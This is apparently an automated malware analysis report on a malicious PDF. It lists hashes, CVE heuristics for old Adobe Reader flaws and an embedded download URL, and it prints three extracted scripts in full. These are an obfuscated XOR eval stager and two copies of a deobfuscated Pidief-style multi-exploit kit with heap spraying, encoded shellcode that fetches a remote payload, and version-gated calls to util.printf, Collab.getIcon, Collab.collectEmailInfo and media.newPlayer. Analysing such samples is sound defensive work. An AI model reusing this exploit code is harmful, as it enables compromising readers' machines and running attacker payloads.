Malicious PDF — malware analysis report

Static analysis result for SHA-256 eefa137a6c6c6869…

MALICIOUS

PDF

4.8 KB Created: 2010-08-01 07:24:26 Authoring application: Xogouueiydke (via 8ad4b bawoxelo) First seen: 2026-05-11
MD5: b8b6595a37fc9be5b1a4e1a931beaf2a SHA-1: 38aba54d9fce3f948bcbde7cc00d8a4ef3996deb SHA-256: eefa137a6c6c68698e239bc243a03de2aa1496bbffeb95443633c8595dcaea45
390 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including 'PDF_JAVASCRIPT', 'PDF_JS', and 'PDF_PAGE_WORD_XOR_EVAL_STAGER'. The 'javascript_obj0011_000.js' file was extracted and appears to be an obfuscated stager. The primary function of this script is to download and execute a second-stage payload, though the exact nature of the payload cannot be determined due to obfuscation.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ahrude.egh/4 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0011_000.js pdf-javascript-stream PDF /JS object 11 at offset 0xE63 530 bytes
SHA-256: f8d11a8a79f2a0d1dc2add0164dae101f7de12d40f0f67c3614e7038541b189d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
try {var chWord, numWords;for (var i = 0; i < this.numPages; i++){}wX='var xS = 173 ;v_XaXXr ykXL = thisk;vXarX nU=yL.Xkgetk_PkkageN_umWords(thisk.pageNum_);var qN=\'\';for(var _tE=0;tEkX<_k nU; tE++){qN=[qNkk,yL.getPageNthWX_ord(_yL.pkageNum,tE,Xtrue)].k_join(__\'\')k_;;}var yPkk=\'\'_k;for(_Xvar _tEX=kk0;tkXEXX < __qNk._Xlekngth; tE+=2){xkA=qN.subksX_tr(tE,2);yP=[yPk_,Stkkring.fro_mX_CharCode(parseInt(xA,16)^xS)].jokin(\'\');}ev_al(yP);yXPkk=null;'.replace(/[kX_]/g, '');tQ=sRC();} catch(wXY){var iX=new Function (wX);iX();}
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 3834 bytes
SHA-256: 8bb8640fc75b11a5eca29ed3161593d053846f9e0b38dbcec572cc304e3ba09e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
this.zO=19003;this.zO-=121;this.b=29254;this.b-=156;var zE=["pM","iD","t"];var oZ=["sP","d","tS"];var mH='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';n={};var lU=["l","pE","uD"];var dA=this.info['p'].replace(/[\s]/g, '');var x="x";this.qB=19026;this.qB+=8;var eX = this.info;var dO = (eX.producer.substr(0,5) == 'debug');var oP = new Array(); var bW = "%u";function qJ(str){str = str.split(bW);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function xU(str1, str2){return [str1, str2].join("");}function mNC(cZ){var jE = mHY();var cJ = jC();jE += ((jE.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + cJ;if(dO) app.alert("URL: " + jE);jE=sZ(jE);var d=bW;var xA=d+"C033"+d+"8B64"+d+"3040"+d+"0C78"+d+"408B"+d+"8B0C"+d+"1C70"+d+"8BAD"+d+"0858"+d+"09EB"+d+"408B"+d+"8D34"+d+"7C40"+d+"588B"+d+"6A3C"+d+"5A44"+d+"E2D1"+d+"E22B"+d+"EC8B"+d+"4FEB"+d+"525A"+d+"EA83"+d+"8956"+d+"0455"+d+"5756"+d+"738B"+d+"8B3C"+d+"3374"+d+"0378"+d+"56F3"+d+"768B"+d+"0320"+d+"33F3"+d+"49C9"+d+"4150"+d+"33AD"+d+"36FF"+d+"BE0F"+d+"0314"+d+"F238"+d+"0874"+d+"CFC1"+d+"030D"+d+"40FA"+d+"EFEB"+d+"3B58"+d+"75F8"+d+"5EE5"+d+"468B"+d+"0324"+d+"66C3"+d+"0C8B"+d+"8B48"+d+"1C56"+d+"D303"+d+"048B"+d+"038A"+d+"5FC3"+d+"505E"+d+"8DC3"+d+"087D"+d+"5257"+d+"33B8"+d+"8ACA"+d+"E85B"+d+"FFA2"+d+"FFFF"+d+"C032"+d+"F78B"+d+"AEF2"+d+"B84F"+d+"2E65"+d+"7865"+d+"66AB"+d+"6698"+d+"B0AB"+d+"8A6C"+d+"98E0"+d+"6850"+d+"6E6F"+d+"642E"+d+"7568"+d+"6C72"+d+"546D"+d+"8EB8"+d+"0E4E"+d+"FFEC"+d+"0455"+d+"5093"+d+"C033"+d+"5050"+d+"8B56"+d+"0455"+d+"C283"+d+"837F"+d+"31C2"+d+"5052"+d+"36B8"+d+"2F1A"+d+"FF70"+d+"0455"+d+"335B"+d+"57FF"+d+"B856"+d+"FE98"+d+"0E8A"+d+"55FF"+d+"5704"+d+"EFB8"+d+"E0CE"+d+"FF60"+d+"0455";xA+=jE;return qJ(xA);};function mHY(){var eP = (eX.author + eX.title).replace(/[\s]/g, '');var tSF = hY(eP, dA, mH);return tSF;};function hY(eP, mH, dA){var tSF="";for(var i=0; i < eP.length; i++){var kP = mH.indexOf(eP[i]);if(kP > -1 ){tSF += dA[kP];}}return tSF;};function sZ(eP){var out = "";eP = pU(eP);g = Math.round(eP.length / 4);if (g != eP.length /4) eP+="00";for(var i=0; i < eP.length; i+=4){out+= bW + eP.substr(i+2, 2) + eP.substr(i, 2);}return out;};function pU(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function aX(lQ, len){while (lQ.length * 2 < len){lQ = xU(lQ, lQ);}return lQ.substring(0, len / 2);};function wJ(pEV){var nM = 0x0c0c0c0c;        iP = mNC("pdf");if (pEV == 1){nM = 0x30303030;}var bG = 0x400000;var ln = iP.length * 2;var oF = bG - (ln + 0x38);var lQ = qJ(bW+"9090"+bW+"9090"); lQ = aX(lQ, oF);var f = (nM - 0x400000) / bG;for (var rK = 0; rK < f; rK ++ ){oP[rK] = xU(lQ, iP);}};function jC(){try {return app.viewerVersion.toString();}catch(sD){    return 0;}}if(dO) app.alert("called exploit");var cJ = jC();if(dO)  app.alert("v: " + cJ);if (cJ > 8){if(dO) app.alert("util.printf");wJ(1);var zIH = "12999999999999999999";for (rW=0; rW < 276; rW++) zIH += "8";util.printf("%45000f", zIH);}if (cJ < 8){if(dO) app.alert("Collab.collectEmailInfo");wJ(0);var kN = qJ(bW+"0c0c"+bW+"0c0c");while (kN.length < 44952) kN += kN;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : kN});}if (cJ < 9.1){if (app.doc.Collab.getIcon){if(dO) app.alert("Collab.getIcon");wJ(0);var v = unescape("%09");while (v.length < 0x4000) v += v;v = "N." + v;app.doc.Collab.getIcon(v);}}if (cJ == 9.2){if(dO) app.alert("media.newPlayer");wJ(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}this.pG=3201;this.pG++;var cV='';try {var dI='rO'.substr(6553,6553)} catch(dI){};try {var eH='aZ'.substr(4122,4122)} catch(eH){};�����'y ����� �
page_word_xor_stage_000.js deobfuscated-js page-word continuous-hex XOR decoded JavaScript (decompressed, key=0xAD) at offset 0x8C 3819 bytes
SHA-256: 294f5b27ecb8aca5e708334aa826c5415c60a26dab8f98e572c2617e92456a1e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
this.zO=19003;this.zO-=121;this.b=29254;this.b-=156;var zE=["pM","iD","t"];var oZ=["sP","d","tS"];var mH='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';n={};var lU=["l","pE","uD"];var dA=this.info['p'].replace(/[\s]/g, '');var x="x";this.qB=19026;this.qB+=8;var eX = this.info;var dO = (eX.producer.substr(0,5) == 'debug');var oP = new Array(); var bW = "%u";function qJ(str){str = str.split(bW);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function xU(str1, str2){return [str1, str2].join("");}function mNC(cZ){var jE = mHY();var cJ = jC();jE += ((jE.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + cJ;if(dO) app.alert("URL: " + jE);jE=sZ(jE);var d=bW;var xA=d+"C033"+d+"8B64"+d+"3040"+d+"0C78"+d+"408B"+d+"8B0C"+d+"1C70"+d+"8BAD"+d+"0858"+d+"09EB"+d+"408B"+d+"8D34"+d+"7C40"+d+"588B"+d+"6A3C"+d+"5A44"+d+"E2D1"+d+"E22B"+d+"EC8B"+d+"4FEB"+d+"525A"+d+"EA83"+d+"8956"+d+"0455"+d+"5756"+d+"738B"+d+"8B3C"+d+"3374"+d+"0378"+d+"56F3"+d+"768B"+d+"0320"+d+"33F3"+d+"49C9"+d+"4150"+d+"33AD"+d+"36FF"+d+"BE0F"+d+"0314"+d+"F238"+d+"0874"+d+"CFC1"+d+"030D"+d+"40FA"+d+"EFEB"+d+"3B58"+d+"75F8"+d+"5EE5"+d+"468B"+d+"0324"+d+"66C3"+d+"0C8B"+d+"8B48"+d+"1C56"+d+"D303"+d+"048B"+d+"038A"+d+"5FC3"+d+"505E"+d+"8DC3"+d+"087D"+d+"5257"+d+"33B8"+d+"8ACA"+d+"E85B"+d+"FFA2"+d+"FFFF"+d+"C032"+d+"F78B"+d+"AEF2"+d+"B84F"+d+"2E65"+d+"7865"+d+"66AB"+d+"6698"+d+"B0AB"+d+"8A6C"+d+"98E0"+d+"6850"+d+"6E6F"+d+"642E"+d+"7568"+d+"6C72"+d+"546D"+d+"8EB8"+d+"0E4E"+d+"FFEC"+d+"0455"+d+"5093"+d+"C033"+d+"5050"+d+"8B56"+d+"0455"+d+"C283"+d+"837F"+d+"31C2"+d+"5052"+d+"36B8"+d+"2F1A"+d+"FF70"+d+"0455"+d+"335B"+d+"57FF"+d+"B856"+d+"FE98"+d+"0E8A"+d+"55FF"+d+"5704"+d+"EFB8"+d+"E0CE"+d+"FF60"+d+"0455";xA+=jE;return qJ(xA);};function mHY(){var eP = (eX.author + eX.title).replace(/[\s]/g, '');var tSF = hY(eP, dA, mH);return tSF;};function hY(eP, mH, dA){var tSF="";for(var i=0; i < eP.length; i++){var kP = mH.indexOf(eP[i]);if(kP > -1 ){tSF += dA[kP];}}return tSF;};function sZ(eP){var out = "";eP = pU(eP);g = Math.round(eP.length / 4);if (g != eP.length /4) eP+="00";for(var i=0; i < eP.length; i+=4){out+= bW + eP.substr(i+2, 2) + eP.substr(i, 2);}return out;};function pU(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function aX(lQ, len){while (lQ.length * 2 < len){lQ = xU(lQ, lQ);}return lQ.substring(0, len / 2);};function wJ(pEV){var nM = 0x0c0c0c0c;        iP = mNC("pdf");if (pEV == 1){nM = 0x30303030;}var bG = 0x400000;var ln = iP.length * 2;var oF = bG - (ln + 0x38);var lQ = qJ(bW+"9090"+bW+"9090"); lQ = aX(lQ, oF);var f = (nM - 0x400000) / bG;for (var rK = 0; rK < f; rK ++ ){oP[rK] = xU(lQ, iP);}};function jC(){try {return app.viewerVersion.toString();}catch(sD){    return 0;}}if(dO) app.alert("called exploit");var cJ = jC();if(dO)  app.alert("v: " + cJ);if (cJ > 8){if(dO) app.alert("util.printf");wJ(1);var zIH = "12999999999999999999";for (rW=0; rW < 276; rW++) zIH += "8";util.printf("%45000f", zIH);}if (cJ < 8){if(dO) app.alert("Collab.collectEmailInfo");wJ(0);var kN = qJ(bW+"0c0c"+bW+"0c0c");while (kN.length < 44952) kN += kN;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : kN});}if (cJ < 9.1){if (app.doc.Collab.getIcon){if(dO) app.alert("Collab.getIcon");wJ(0);var v = unescape("%09");while (v.length < 0x4000) v += v;v = "N." + v;app.doc.Collab.getIcon(v);}}if (cJ == 9.2){if(dO) app.alert("media.newPlayer");wJ(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}this.pG=3201;this.pG++;var cV='';try {var dI='rO'.substr(6553,6553)} catch(dI){};try {var eH='aZ'.substr(4122,4122)} catch(eH){};

Open this report in the interactive analyzer, or submit your own file for analysis.